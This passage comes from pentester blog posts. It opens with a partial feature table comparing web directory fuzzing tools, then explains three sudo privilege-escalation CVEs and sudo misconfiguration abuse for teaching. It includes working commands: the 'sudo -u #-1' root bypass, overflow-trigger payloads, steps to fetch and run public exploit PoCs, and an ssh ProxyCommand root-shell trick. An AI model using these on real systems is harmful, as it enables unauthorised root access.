Output | No (-o, text only) | Yes (XML, CSV, TXT) | Yes (JSON, XML, MD, CSV, TXT) | Yes (JSON, EJSON, HTML, MD, CSV, ECSV) | No (-o, text only) | Yes (-o, JSON, CSV, HTML, Raw) | No (-o, text only) | Yes (-o, XML, CSV, TXT) | No (--logfile, text only) | Yes (JSON, CSV, TXT) |
Multithread | No | Up to 500 | Yes (-t) | Yes (-t) | Yes (-t) | Yes (-t) | Yes (-t) | Yes (-t) | Yes (-t) | Yes (--threads) |
Delay | Yes (-z) | Yes (Rate limit) | Yes (-s) | Yes (-p), accept range | Yes (--delay) | Yes (-s) | No | No | Yes (--requests-per-second) | Yes (Rate limit) |
Custom Timeout | No | Yes | Yes (--timeout) | Yes (-timeout) | Yes (--timeout) | Yes (--req-delay) | No | Yes (-T) | No | Yes (--timeout) |
Proxy | Yes (-p/-P, socks5) | Yes (not specified, authenticated) | Yes (--proxy, http/socks5) | Yes (-x, http, see issue 50) | Yes (--proxy, http(s)) | Yes (-p) Socks4 / Socks5 / HTTP (unauthent) | No | No | Yes (SOCKS5/HTTP(s) authenticated) | Yes (--proxy, http(s)/socks5 authenticated) |
Auth | Basic | Basic / Digest / NTLM | Basic with Headers | Basic with Headers | Basic (-U/-P) | Basic / Digest / NTLM | Basic with Headers | No | Basic (-u) | Basic with Headers |
Default WL | common.txt (4614) | No | dicc.txt (9000) | No | No | No | No | dirb_common.txt (4614) | No | N/A |
WL provided | Yes (more than 30) | Yes (8) | Yes (5) | No | No | Yes (more than 30) | No | Yes (3) | No | N/A |
Recursion | By default, switch available | Yes | Yes (-r) | Yes (-recursion) | No | Yes (-R) | No | No | No | N/A |
Recursion depth | No but interactive mode available | No | Yes (-R) + interactive | Yes (-recursion-depth) | N/A | Yes (-R) | N/A | N/A | N/A | N/A |
Multiple URLs | No | No | Yes (-l) / CIDR | Yes (using wordlist of hosts) | No | Yes (using wordlist of hosts) | No | No | No | Yes (-L) |
Multiple WL | Yes (commas separated) | No | Yes, commas separated | Yes (repeat -w) | No | Yes (repeat -w) | Yes (for multiple fuzzing points) | No | No | N/A |
WL Manipulation | No | No | Yes (lots of transformations) | No | No | Yes (using encoders and script) | No | No | No | N/A |
Encoders | No | No | No | No | No | Yes | No | No | No | N/A |
Single Extension | Yes (-X/-x) | Yes | Yes (-e) | Yes (-e) | Yes (-x) | Yes | Yes (-e) | Yes (-e) | Yes | N/A |
Multiple Extensions | Yes (-X/-x) | Yes (commas separated) | Yes (-e, commas separated) | Yes (-e, commas separated) | Yes (-x, commas separated) | Yes (with given wordlist) | Yes (-e, commas separated) | Yes (-e, commas separated) | No | N/A |
Custom User-Agent | Yes (-a/-H) | Yes | Yes (--user-agent) + random | Yes (with header -H) | Yes (-a) + random | Yes (with header -H) | Yes (-a) | No | Yes (with header -H) | Yes (-ua) |
Custom Cookie | Yes (-c/-H) | Yes (through headers) | Yes (--cookie) | Yes (with header -H) | Yes (-c) | Yes (-b) | Yes (with header -H) | No | Yes (with header -H) | Yes (--cookie) |
Custom Header | Yes (-H) | Yes | Yes (-H) + Headers file | Yes (-H) | Yes (-H) | Yes (-H) | Yes (-H) | No | Yes (-H) | Yes (--headers) |
Custom Method | No | No | Yes (-m) | Yes (-x) | Yes (-m) | Yes (-X) | Yes (-X) | No | Yes (-X) | No |
URL fuzzing (at any point) | No | Yes | Not by design but can be bypassed using --suffixes | Yes | No | Yes | Yes (fuzz mode) | No | Yes (fuzz mode) | N/A |
Post data fuzzing | No | No | No | Yes (-d) | No | Yes (-d) | Yes (fuzz mode) | No | Yes (fuzz mode) | N/A |
Header fuzzing | No | No | No | Yes (-H) | No | Yes | Yes (fuzz mode) | No | Yes (fuzz mode) | N/A |
Method fuzzing | No | No | No | Yes (-X FUZZ) | No | Yes (-X FUZZ) | Yes (fuzz mode) | No | Yes (fuzz mode) | N/A |
Raw file ingest | No | No | Yes (--raw) | Yes (-request) | No | No | No | No | Yes (--template-file) | No |
Follow redirect (302) | Yes + switch (-N) | Yes + switch | Yes (-F) | Yes (-r) | Yes (-r) | Yes (-L) | No | No | Yes (--follow-redirect) | No |
Custom filters | No | No | Yes (--excludes-*, based on text, size, regex) | Yes (-m*, -f*, based on code, size, regex) | Limited (status code, -s/-b) | Yes (based on code, words, regex) | Yes (based on code, string) | No | Yes (size,code,regex) | Yes (code, size or both) |
Backup files option | No | No | No | No | Yes (-d) | No | No | No | No | Yes |
Replay proxy | No | No | Yes (--replay-proxy) | Yes (-replay-proxy) | No | No | No | No | No | No |
Ignore certificate errors | By default? | By default? | By default | By default (switch with -k) | Yes (-k) | By default | Yes (-k) | Yes (-s) | Yes (-k) | By default |
Specify IP to connect to | No | No | Yes (--ip) | No | No | Yes (--ip) | No | No | No | No |
Vhost enumeration | No | No | No | Yes | Yes | Yes | Yes | No | Yes | N/A |
Subdomain enumeration | No | No | No | Yes | Yes | Yes | Yes | Yes | Yes | N/A |
S3 enumeration | No | No | No | No | Yes | No | No | No | No | N/A |
This piece was written by Alex GARRIDO a.k.a. zeecka. Alex is a pentester at SEC-IT.
Website: zeecka.fr
An introduction to 3 sudo vulnerabilities: CVE-2019-14287, CVE-2019-18634, CVE-2021-3156.
Here are the few vulnerabilities we will cover:
Vulnerability | Version | Prerequisite | Type |
---|---|---|---|
CVE-2019-14287 | < 1.8.28 | Requires permission to execute a command as another user | integer overflow, security bypass |
CVE-2019-18634 | < 1.8.26 | Requires pwfeedback option enabled | stack-based BoF |
CVE-2021-3156 (Baron Samedit) | < 1.9.5p2 | None | heap-based BoF |
CVE-2019-14287 exploits an integer overflow in the user ID variable.
an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can cause incorrect logging, by invoking sudo with a crafted user ID. For example, this allows bypass of !root configuration, and USER= logging, for a "sudo -u #$((0xffffffff))" command.
For example, if we have the following configuration in /etc/sudoers
, user secit
should be able to run any command as any user except root
.
secit ALL=(ALL:!root) NOPASSWD: ALL
The user should see this:
$ sudo -ll
root
has the user ID zero.
In pseudo-code, it can be translated to:
unless userid == 0
The well-known syntax to run a command as another user is:
$ sudo -u <user> <cmd>
But it's also possible to provide the user id instead of the username:
$ sudo -u#<id> <cmd>
But the user ID -1
(signed int) causes an integer overflow and is translated to 4294967295
(0xffffffff
), so the pseudo-check userid == 0
is bypassed, since 4294967295 != 0
. When this value is later passed to setresuid(), -1 means "leave the UID unchanged", and because sudo already runs with UID 0, the command executes as root.
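The wraparound is easy to reproduce on the command line (python3 used here purely as a calculator):

```shell
# Interpreting -1 as an unsigned 32-bit integer yields the magic value
python3 -c 'print(-1 & 0xFFFFFFFF)'       # 4294967295
python3 -c 'print(hex(-1 & 0xFFFFFFFF))'  # 0xffffffff
```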
Exploiting the vulnerability is as easy as running one of the following examples:
$ sudo -u \#-1 /bin/bash
TryHackMe is hosting a vulnerable environment, so it's possible to try this vulnerability in a sandbox.
CVE-2019-18634 exploits a stack-based buffer overflow in the function getln()
from the file tgetpass.c
. But this vulnerability only works if the pwfeedback
option is enabled in /etc/sudoers
, which is not the default for upstream and most packages from widely used Linux distros. However, in 2019, Linux Mint and elementary OS were using pwfeedback
by default. pwfeedback
is a display feature that shows an asterisk each time a user types a character of their password. So even at the time the vulnerability was found, it was not likely that a system would be vulnerable to it.
Here are some commands to check if sudo is vulnerable (you should get a segmentation fault):
$ ruby -e 'puts ("A"*100 + "\x00")*50' | sudo -S id
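If ruby is not installed, the same payload (50 repetitions of 100 A's followed by a NUL byte, 5050 bytes in total) can be generated with python3 — a direct translation, not part of the original check:

```shell
# Same payload as the ruby one-liner, written to a file first
python3 -c 'import sys; sys.stdout.buffer.write((b"A"*100 + b"\x00")*50)' > payload
# then: sudo -S id < payload
```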
To exploit the vulnerability we can use a Proof of Concept (PoC) from Saleem Rashid hosted on the following git repository: saleemrashid/sudo-cve-2019-18634.
Details of the exploit steps can be found in the comments of exploit.c.
An easy scenario could be:

1. wget the PoC (exploit.c)
2. gcc -o exploit exploit.c
3. ./exploit
The output should be as follows:
$ ./exploit
TryHackMe is hosting a vulnerable environment, so it's possible to try this vulnerability in a sandbox.
CVE-2021-3156 (a.k.a. Baron Samedit) exploits a heap-based buffer overflow. This one is way more powerful than the two previous vulnerabilities we saw earlier because it works with the default configuration and affects nearly a decade of sudo releases (legacy 1.8.2 to 1.8.31p2 and stable 1.9.0 to 1.9.5p1).
Here are some commands to check if sudo is vulnerable (you should get an error malloc(): memory corruption
):
$ sudoedit -s '\' $(ruby -e 'puts "A"*1000')
To exploit the vulnerability we can use a Proof of Concept (PoC) from blasty hosted on the following git repository: blasty/CVE-2021-3156.
An easy scenario could be:

1. wget the PoC
2. make
3. ./sudo-hax-me-a-sandwich
The output should be as follows:
$ ./sudo-hax-me-a-sandwich 0
TryHackMe is hosting a vulnerable environment, so it's possible to try this vulnerability in a sandbox.
Even if sudo
is fully up to date and patched, a misconfiguration can open a door for the attacker.
The following config gives user secit the permission to execute ssh
as anybody, including root.
secit ALL=(ALL) /usr/bin/ssh
A lot of legitimate Linux binaries can be abused to bypass local security restrictions, break out of restricted shells, escalate privileges, or facilitate other post-exploitation tasks.
So if root permission is given via sudo to use one of these binaries, it's very likely that an attacker can get root permission easily.
A list of those binaries can be found on the GTFOBins website or browsed offline using a CLI tool like GTFOBLookup.
An example of ssh
abuse:
$ gtfoblookup linux sudo ssh
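For reference, the GTFOBins entry for ssh with sudo relies on the ProxyCommand option, which ssh executes locally before opening any connection — shown here as a sketch, with x as a dummy hostname:

```shell
# ProxyCommand runs under the elevated privileges granted by sudo,
# so this spawns a root shell without connecting anywhere
sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
```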
There is also a Metasploit module called post/multi/recon/sudo_commands
doing the following:
This module examines the sudoers configuration for the session user and lists the commands executable via sudo. This module also inspects each command and reports potential avenues for privileged code execution due to poor file system permissions or permitting execution of executables known to be useful for privesc, such as utilities designed for file read/write, user modification, or execution of arbitrary operating system commands. Note, you may need to provide the password for the session user
There are great virtual environments to practice exploiting those binaries and misconfigured sudo:

- the Privilege Escalation
section from the Linux Agency room on TryHackMe

This piece was written by Alexandre ZANNI a.k.a. noraj. Alexandre is a pentester and a BlackArch maintainer.
Website: pwn.by/noraj